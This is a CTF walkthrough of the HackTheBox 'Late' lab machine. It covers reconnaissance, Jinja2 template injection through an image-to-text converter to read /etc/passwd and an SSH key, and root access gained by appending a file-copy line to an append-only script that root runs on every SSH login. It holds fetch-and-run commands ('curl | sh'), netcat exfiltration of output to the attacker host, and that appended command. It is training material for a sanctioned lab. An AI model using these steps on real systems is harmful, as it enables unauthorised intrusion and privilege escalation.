HTB Late Walkthrough

A technical walkthrough of the HackTheBox LATE challenge from the King of HTB Andy From Italy.

HTB Late Walkthrough
Ukrainian ZSU Combat Medic Holding A

Simple, but with well-hidden clues. Much time spent researching the right exploits. Let's see what steps were required to capture the flags of this BOX.

The nmap scan:

Starting Nmap 7.92 ( ) at 2022-05-11 21:20 CEST
Nmap scan report for
Host is up (0.060s latency).
Not shown: 998 closed tcp ports (conn-refused)
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-title: Late - Best online image tools
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 23.05 seconds

Really simple. In the portal, we find a contact form, the email for support (support@late.htb) and an obvious indication of a portal with a third-level domain (images.late.htb). Insert the new address in the /etc/hosts file and navigate through the browser.

Interesting, I try to pass some files to understand what we are dealing with (even unrelated to the description shown on the portal). The message I receive is "invalid extension", but keeping to the standards of functionality and passing an image with some text, I receive a ".txt" file with the text contained in the image.

In any case, I go ahead and check with dirb if there is any hidden folder (although I am almost convinced that my goal is this converter).

└─$ dirb http://images.late.htb/

DIRB v2.22    
By The Dark Raver

START_TIME: Wed May 11 21:50:16 2022
URL_BASE: http://images.late.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: http://images.late.htb/ ----
END_TIME: Wed May 11 21:54:19 2022

Nothing on the image service converter...

└─$ dirb http://late.htb/ 

DIRB v2.22    
By The Dark Raver

START_TIME: Wed May 11 22:09:32 2022
URL_BASE: http://late.htb/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt


GENERATED WORDS: 4612                                                          

---- Scanning URL: http://late.htb/ ----
==> DIRECTORY: http://late.htb/assets/                                                                             
+ http://late.htb/index.html (CODE:200|SIZE:9461)                                                                  
---- Entering directory: http://late.htb/assets/ ----
==> DIRECTORY: http://late.htb/assets/css/                                                                         
==> DIRECTORY: http://late.htb/assets/fonts/                                                                       
==> DIRECTORY: http://late.htb/assets/images/                                                                      
==> DIRECTORY: http://late.htb/assets/js/                                                                          

...and not even on the original portal. Let's go back to the conversion service. The title says it's written in Flask, a Python web micro-framework, based on the Jinja2 template engine. Looking for "injection in flask" I find some interesting links.

Injecting Flask
We’ve taken a look at some of the features provided in Flask for output escaping, the potential issues, and the fixes available should you come across some vulnerable code.

So I write something with a text editor and take a screenshot of it...

...load the image on the portal and I receive the message "Error occured while processing the image: unexpected char '“' at 10".

For the moment we can say that perhaps we are on the right path. I make a few more attempts to understand how to best exploit the vulnerability and at the same time continue with the research, finding another interesting link.

Server Side Template Injection with Jinja2
In this post, Gus looks into building Jinja2 SSTI payloads from zero. While also playing with bypass methods and different exploitation techniques.

The output is...

<p> a 

I think I have to mix the information I have found, but I am more and more convinced that I am on the right path. I spend part of the time looking for the most suitable font for the conversion; many of the problems come from the fact that the converter gets confused with the underscore character "_" (just what I need most to reach the classes), sometimes identifying only one. I, therefore, find a font whose underscores in sequence are clearly visible through a space between them, the "Lucida Bright".

The output is the following:

<p>[&lt;class &#39;type&#39;&gt;, &lt;class &#39;weakref&#39;&gt;, &lt;class &#39;weakcallableproxy&#39;&gt;, &lt;class &#39;weakproxy&#39;&gt;, &lt;class &#39;int&#39;&gt;, &lt;class &#39;bytearray&#39;&gt;, [...] &lt;class &#39;WebPAnimDecoder&#39;&gt;, &lt;class &#39;WebPAnimEncoder&#39;&gt;]

Than formatting in a more readable way:

[<class 'type'>, 
<class 'weakref'>, 
<class 'weakcallableproxy'>, 
<class 'weakproxy'>, 
<class 'int'>, 
<class 'bytearray'>, 
<class 'bytes'>, 
<class 'list'>, 
<class 'NoneType'>, 
<class 'WebPAnimDecoder'>, 
<class 'WebPAnimEncoder'>]

I have some difficulties not finding the available classes listed in the article. I, therefore, focus on the ones I see in the list that can work in the same way; having to access the files, the IOBase could be for me.

io — Core tools for working with streams — Python 3.10.4 documentation

I'm not that lucky though, and I can't get the methods of the class. I retrace my steps and read the article again. Investigating the specific classes used in the example, in the end, I understand that they are still available as standard classes of the framework in use. I can therefore use them without problems.

So I try the "get_flashed_messages" class, but I still have some problems. So I decided to look for some specific exploit.

RCE with Server-Side Template Injection
RCE with Server-Side Template Injection by Nairuz Abulhul Server-side template injection is a web application vulnerability that occurs in template-generated applications. User inputs get embedded dynamically into the template variables and rendered on the web pages. Like

...and finally...

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash
usbmux:x:112:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
avahi:x:113:116:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
cups-pk-helper:x:114:117:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
colord:x:116:120:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
pulse:x:117:121:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
smmta:x:119:124:Mail Transfer Agent,,,:/var/lib/sendmail:/usr/sbin/nologin
smmsp:x:120:125:Mail Submission Program,,,:/var/lib/sendmail:/usr/sbin/nologin


Well, let's see which users can log in with a shell.

┌──(in7rud3r㉿Mykali)-[~/Dropbox/hackthebox/_10.10.11.156 - Late (lin)]
└─$ grep -v nologin ~/Downloads/results\(24\).txt
svc_acc:x:1000:1000:Service Account:/home/svc_acc:/bin/bash


Apparently, there is only one user other than root who has access to a shell (svc_acc).

...and the first flag appears...



And since we have such a nice user, who knows that he also left us a private key for the SSH connection.



Woooo, great! :)

Before moving on I want to share a screenshot of the tests I did during the session, to make you understand how long and patient an activity of this type can be.

Then, we prepare our private key and access the BOX in SSH.

┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/ssh]
└─$ cp ~/Downloads/results\(26\).txt ./id_rsa
┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/ssh]
└─$ vi id_rsa  
┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/ssh]
└─$ chmod 400 id_rsa                         
┌──(in7rud3r㉿Mykali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/ssh]
└─$ ssh -i id_rsa svc_acc@ 
The authenticity of host ' (' can't be established.
ED25519 key fingerprint is SHA256:LsThZBhhwN3ctG27voIMK8bWCmPJkR4iDV9eb/adDOc.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '' (ED25519) to the list of known hosts.

Immediately check if I can do something as root without entering the password (the classic clue for an HTB BOX).

svc_acc@late:~$ sudo -l
[sudo] password for svc_acc: 
Sorry, try again.
[sudo] password for svc_acc: 
Sorry, try again.
[sudo] password for svc_acc: 
sudo: 3 incorrect password attempts

Once again I'm not that lucky. I download the updated version of and prepare for a session.

┌──(kali㉿kali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/upld]
└─$ wget
--2022-05-18 15:28:03--
Resolving (
Connecting to (||:443... connected.
Saving to: ‘’                       100%[==========================================================>] 758.56K  1.06MB/s    in 0.7s    

2022-05-18 15:28:04 (1.06 MB/s) - ‘’ saved [776761/776761]

┌──(kali㉿kali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/upld]
└─$ php -S
[Wed May 18 15:28:50 2022] PHP 8.1.2 Development Server ( started

We launch the linpeas on the BOX without downloading it...

svc_acc@late:~$ curl | sh | tee lpeas.out

...recover the file obtained by first activating a listener on our machine...

┌──(kali㉿kali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/dwnl]
└─$ nc -lp 4445 > lpeas.out

...and finally, let's send it from the BOX to the listener.

svc_acc@late:~$ nc -w 3 4445 < lpeas.out

Perfect, let's take a look at the file and mark the possible points to investigate.


╔══════════╣ Sudo version
Sudo version 1.8.21p2                                                                                                               
╔══════════╣ Executing Linux Exploit Suggester
[+] [CVE-2021-4034] PwnKit                                                                                                          

   Exposure: probable
   Tags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaro
   Download URL:

[+] [CVE-2021-3156] sudo Baron Samedit

   Exposure: probable
   Tags: mint=19,[ ubuntu=18|20 ], debian=10
   Download URL:

[+] [CVE-2021-3156] sudo Baron Samedit 2

   Exposure: probable
   Tags: centos=6|7|8,[ ubuntu=14|16|17|18|19|20 ], debian=9|10
   Download URL:

[+] [CVE-2018-18955] subuid_shell

   Exposure: probable
   Tags: [ ubuntu=18.04 ]{kernel:4.15.0-20-generic},fedora=28{kernel:4.16.3-301.fc28}
   Download URL:
   Comments: CONFIG_USER_NS needs to be enabled

[+] [CVE-2021-22555] Netfilter heap out-of-bounds write

   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL:
   Comments: ip_tables kernel module must be loaded

[+] [CVE-2019-18634] sudo pwfeedback

   Exposure: less probable
   Tags: mint=19
   Download URL:
   Comments: sudo configuration requires pwfeedback to be enabled.

[+] [CVE-2019-15666] XFRM_UAF

   Exposure: less probable
   Download URL: 
   Comments: CONFIG_USER_NS needs to be enabled; CONFIG_XFRM needs to be enabled

[+] [CVE-2017-5618] setuid screen v4.5.0 LPE

   Exposure: less probable
   Download URL:

[+] [CVE-2017-0358] ntfs-3g-modprobe

   Exposure: less probable
   Tags: ubuntu=16.04{ntfs-3g:2015.3.14AR.1-1build1},debian=7.0{ntfs-3g:2012.1.15AR.5-2.1+deb7u2},debian=8.0{ntfs-3g:2014.2.15AR.2-1
   Download URL:
   Comments: Distros use own versioning scheme. Manual verification needed. Linux headers must be installed. System must have at lea
st two CPU cores.
╔══════════╣ Active Ports
tcp        0      0 *               LISTEN      -                                                   
tcp        0      0    *               LISTEN      -                   
tcp        0      0  *               LISTEN      -                   
tcp        0      0*               LISTEN      1295/python3        
tcp        0      0 *               LISTEN      -                   
tcp        0      0    *               LISTEN      -                   
tcp6       0      0 :::22                   :::*                    LISTEN      -                   
tcp6       0      0 :::80                   :::*                    LISTEN      -                   
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════                             
╔══════════╣ SUID - Check easy privesc, exploits and write perms
-rwsr-xr-- 1 root dip 370K Jul 23  2020 /usr/sbin/pppd  --->  Apple_Mac_OSX_10.4.8(05-2007)                                         
-rwsr-xr-x 1 root root 10K Jan 13  2018 /usr/sbin/sensible-mda (Unknown SUID binary)
-rwsr-xr-x 1 root root 75K Jan 25 16:26 /usr/bin/chfn  --->  SuSE_9.3/10
-rwsr-xr-x 1 root root 37K Jan 25 16:26 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 59K Jan 25 16:26 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solar
-rwsr-xr-x 1 root root 19K Jun 28  2019 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 40K Jan 25 16:26 /usr/bin/newgrp  --->  HP-UX_10.20
-rwsr-xr-x 1 root root 146K Jan 19  2021 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 44K Jan 25 16:26 /usr/bin/chsh
-rwsr-xr-x 1 root root 22K Jun 28  2019 /usr/bin/arping
-rwsr-sr-x 1 root mail 95K Nov 16  2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 37K Jan 25 16:26 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 75K Jan 25 16:26 /usr/bin/gpasswd
-rwsr-sr-x 1 daemon daemon 51K Feb 20  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-xr-x 1 root root 427K Mar  3  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 42K Jun 11  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 14K Jan 12 12:34 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 99K Nov 23  2018 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 31K Aug 11  2016 /bin/fusermount
-rwsr-xr-x 1 root root 43K Sep 16  2020 /bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 44K Jan 25 16:26 /bin/su
-rwsr-xr-x 1 root root 63K Jun 28  2019 /bin/ping
-rwsr-xr-x 1 root root 27K Sep 16  2020 /bin/umount  --->  BSD/Linux(08-1996)

╔══════════╣ SGID
-rwxr-sr-x 1 root tty 31K Sep 16  2020 /usr/bin/wall                                                                                
-rwxr-sr-x 1 root shadow 23K Jan 25 16:26 /usr/bin/expiry
-rwxr-sr-x 1 root mail 18K Nov 16  2017 /usr/bin/lockfile
-rwxr-sr-x 1 root ssh 355K Mar  3  2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 14K Jan 17  2018 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 71K Jan 25 16:26 /usr/bin/chage
-rwsr-sr-x 1 root mail 95K Nov 16  2017 /usr/bin/procmail
-rwxr-sr-x 1 root mlocate 43K Mar  1  2018 /usr/bin/mlocate
-rwxr-sr-x 3 root mail 15K Apr 21  2017 /usr/bin/mail-lock
-rwxr-sr-x 1 root mail 18K Dec  3  2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root mail 11K Nov  7  2017 /usr/bin/dotlock.mailutils
-rwsr-sr-x 1 daemon daemon 51K Feb 20  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwxr-sr-x 3 root mail 15K Apr 21  2017 /usr/bin/mail-touchlock
-rwxr-sr-x 1 root crontab 39K Nov 16  2017 /usr/bin/crontab
-rwxr-sr-x 3 root mail 15K Apr 21  2017 /usr/bin/mail-unlock
-rwxr-sr-x 1 root smmsp 845K Jan 13  2018 /usr/lib/sm.bin/sendmail  --->  Sendmail_8.10.1/Sendmail_8.11.x/Linux_Kernel_2.2.x_2
-rwxr-sr-x 1 root smmsp 77K Jan 13  2018 /usr/lib/sm.bin/mailstats (Unknown SGID binary)
-rwxr-sr-x 1 root utmp 10K Mar 11  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root shadow 34K Apr  8  2021 /sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34K Apr  8  2021 /sbin/unix_chkpwd
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
╔══════════╣ Backup files (limited 100)
-rw-r--r-- 1 root smmsp 65205 Jan 14 11:11 /var/backups/
-rw-r--r-- 1 root smmsp 44599 Jan 14 10:20 /var/backups/
-rw-r--r-- 1 root smmsp 2375 Jan 14 10:20 /var/backups/
-rw-r--r-- 1 root smmsp 4209 Jan 14 10:20 /var/backups/

╔══════════╣ Searching tables inside readable .db/.sql/.sqlite files (limit 100)
Found /etc/mail/access.db: regular file, no read permission                                                                         
Found /etc/mail/aliases.db: regular file, no read permission
Found /var/lib/mlocate/mlocate.db: regular file, no read permission
Found /var/lib/PackageKit/transactions.db: SQLite 3.x database, last written using SQLite version 3022000

A lot of points, really too much, let's concentrate on the suggested CVEs.

┌──(kali㉿kali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/dwnl]
└─$ grep -i CVE lpeas.out
╔══════════╣ CVEs Check
[+] [CVE-2021-4034] PwnKit
   Download URL:
[+] [CVE-2021-3156] sudo Baron Samedit
   Download URL:
[+] [CVE-2021-3156] sudo Baron Samedit 2
   Download URL:
[+] [CVE-2018-18955] subuid_shell
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
   Download URL:
[+] [CVE-2019-18634] sudo pwfeedback
   Download URL:
[+] [CVE-2019-15666] XFRM_UAF
[+] [CVE-2017-5618] setuid screen v4.5.0 LPE
[+] [CVE-2017-0358] ntfs-3g-modprobe
-rwsr-sr-x 1 daemon daemon 51K Feb 20  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)
-rwsr-sr-x 1 daemon daemon 51K Feb 20  2018 /usr/bin/at  --->  RTru64_UNIX_4.0g(CVE-2002-1614)

The set of points and CVEs suggested took me a long time, not leading me to nothing and I had to retrace my steps in the end.

The CVEs suggested were not useful for my business, some did not work while for others I did not find suitable exploits. I then resumed the analysis of the points that I have reported as those of my interest. For example, open port locally to the machine and reachable only from the inside.

svc_acc@late:~$ curl
220 localhost.localdomain ESMTP Sendmail 8.15.2/8.15.2/Debian-10; Thu, 19 May 2022 19:24:51 GMT; (No UCE/UBE) logging access from: localhost.localdomain(OK)-localhost.localdomain []
421 4.7.0 localhost.localdomain Rejecting open proxy localhost.localdomain []
svc_acc@late:~$ curl
220 localhost.localdomain ESMTP Sendmail 8.15.2/8.15.2/Debian-10; Thu, 19 May 2022 19:25:43 GMT; (No UCE/UBE) logging access from: localhost.localdomain(OK)-localhost.localdomain []
421 4.7.0 localhost.localdomain Rejecting open proxy localhost.localdomain []
svc_acc@late:~$ curl
<!DOCTYPE html>
<html lang="en">
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta http-equiv="x-ua-compatible" content="ie=edge">
    <title>Image Reader</title>
    <div class="container">
        <h1 class="text-center" style="font-size: 10vh">Convert image to text<span style="font-size: 3vh;">with Flask</span></h1>

        <h4 align='center'>If you want to turn an image into a text document, you came to the right place.</h4>

Hence, port 25 and 587 appear to be the SMTP server, while port 8000 is the portal exposed on the third-level domain. In both cases we should be able to investigate further, they could be our point of attack, let's take this in mind and look for something else.

However, I cross the SMTP server info with a file that could be interesting, that of the root user's mail, but it seems that I do not have the permissions to read it.

svc_acc@late:~$ ls -la /var/mail/root
-rw------- 1 root mail 13377 May 19 19:23 /var/mail/root
svc_acc@late:~$ cat /var/mail/root
cat: /var/mail/root: Permission denied

I'll spare you the boredom of all the remaining attempts I've made, but I'll list them for completeness of the information:

  • nothing on the file modified in the last 5 minutes
  • nothing on the backup files
  • no SUID or SGID
  • nothing checking running processes on the BOX

Dead end, I return to the linpeas output focusing, this time, on everything I had previously excluded. I check all the services listed, but still nothing. Then the phrase "You own the script" catches my attention.

╔══════════╣ .sh files in path
You own the script: /usr/local/sbin/                                                                                     

Let's see what's inside.

svc_acc@late:~$ cat /usr/local/sbin/

SUBJECT="Email from Server Login: SSH Alert"

A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}

It appears to contain simply sending an email with some server information. The text appears to notify the start of an SSH session. That an email is sent to the root user every time someone logs in? Let's take a look at the running processes.

svc_acc@late:/usr/lib/sm.bin$ ps -aux | grep
root       524  0.0  0.1  20056  3548 ?        Ss   20:30   0:00 /bin/bash /usr/local/sbin/
root       603  0.0  0.1  20056  3588 ?        Ss   20:30   0:00 /bin/bash /usr/local/sbin/
root       922  0.0  0.1  20056  3508 ?        Ss   20:31   0:00 /bin/bash /usr/local/sbin/
svc_acc   1222  0.0  0.0  13144  1068 pts/5    S+   20:32   0:00 grep --color=auto
root     31631  0.0  0.1  20056  3624 ?        Ss   20:21   0:00 /bin/bash /usr/local/sbin/
root     31638  0.0  0.0  20056   292 ?        S    20:21   0:00 /bin/bash /usr/local/sbin/
root     31696  0.0  0.1  20056  3604 ?        Ss   20:23   0:00 /bin/bash /usr/local/sbin/
root     31708  0.0  0.0  20056   292 ?        S    20:23   0:00 /bin/bash /usr/local/sbin/
root     31775  0.0  0.1  20056  3692 ?        Ss   20:24   0:00 /bin/bash /usr/local/sbin/
root     31782  0.0  0.0  20056   288 ?        S    20:24   0:00 /bin/bash /usr/local/sbin/
root     31823  0.0  0.1  20056  3656 ?        Ss   20:24   0:00 /bin/bash /usr/local/sbin/
root     31834  0.0  0.0  20056   292 ?        S    20:24   0:00 /bin/bash /usr/local/sbin/

Scripts always appear to be run by the root user. It would seem too easy, as the owner of the file I can modify the script to my liking, for example by copying the root flag file where I want, to read it later following an SSH login. I try, but as soon as I try to save the file, I am warned that I cannot write the file.

WARNING: The file has been changed since reading it!!!
Do you really want to write to it (y/n)?y
"/usr/local/sbin/" E166: Can't open linked file for writing
Press ENTER or type command to continue

Let's take a closer look at the file.

svc_acc@late:/usr/lib/sm.bin$ ls -la /usr/local/sbin/
-rwxr-xr-x 1 svc_acc svc_acc 433 May 19 20:37 /usr/local/sbin/

I had to make a huge effort to understand, but when one of the most interesting sources in history came to mind, the road was illuminated. "Appunti di informationlibera " is one of the manuals that, when I started to approach linux, was my source of absolute truth (as well as, sorry for the gap, written by an Italian). I remembered the chapter on file permissions and in particular a very interesting feature of some linux systems: the ability to specify the modification of a file in append mode only. I report both the link of the original manual, in Italian...

Appunti di informatica libera

...and the same article in English.

File Permissions

So, let's check it out.

svc_acc@late:~$ lsattr /usr/local/sbin/
-----a--------e--- /usr/local/sbin/
svc_acc@late:~$ lsattr -l /usr/local/sbin/
/usr/local/sbin/ Append_Only, Extents

As I imagined and if I still remember correctly, the removal of this particular feature is reserved for the root user only.

svc_acc@late:~$ chattr -a /usr/local/sbin/
chattr: Operation not permitted while setting flags on /usr/local/sbin/

Not bad, we can copy the file after the email has been sent.

svc_acc@late:/tmp$ echo "cp --no-preserve=mode,ownership /root/root.txt /tmp/tempr.txt " >> /usr/local/sbin/

Let's try to connect again and hope that our first guess (script started on every SSH login) is correct.

┌──(kali㉿kali)-[~/…/hackthebox/_10.10.11.156 - Late (lin)/attack/ssh]
└─$ ssh -i id_rsa svc_acc@

It's the moment of truth.

svc_acc@late:/tmp$ ls -la
total 48
drwxrwxrwt 11 root root 4096 May 19 21:25 .
drwxr-xr-x 23 root root 4096 Apr  7 13:51 ..
prw-rw-r--  1 root root    0 May 19 21:21 f
drwxrwxrwt  2 root root 4096 May 19 21:06 .font-unix
drwxrwxrwt  2 root root 4096 May 19 21:06 .ICE-unix
drwx------  3 root root 4096 May 19 21:06 systemd-private-8267cd81555543ff99d2427c25ca56db-ModemManager.service-s6mam1
drwx------  3 root root 4096 May 19 21:06 systemd-private-8267cd81555543ff99d2427c25ca56db-systemd-resolved.service-qmQkZt
drwx------  3 root root 4096 May 19 21:06 systemd-private-8267cd81555543ff99d2427c25ca56db-systemd-timesyncd.service-g3VCd9
-rw-rw-r--  1 root root   33 May 19 21:25 tempr.txt
drwxrwxrwt  2 root root 4096 May 19 21:06 .Test-unix
drwx------  2 root root 4096 May 19 21:06 vmware-root_745-4290690999
drwxrwxrwt  2 root root 4096 May 19 21:06 .X11-unix
drwxrwxrwt  2 root root 4096 May 19 21:06 .XIM-unix
svc_acc@late:/tmp$ cat tempr.txt 

Well done my friends, root flag captured. I hope you enjoyed yourself as always. That's all folks. Good hacking activities.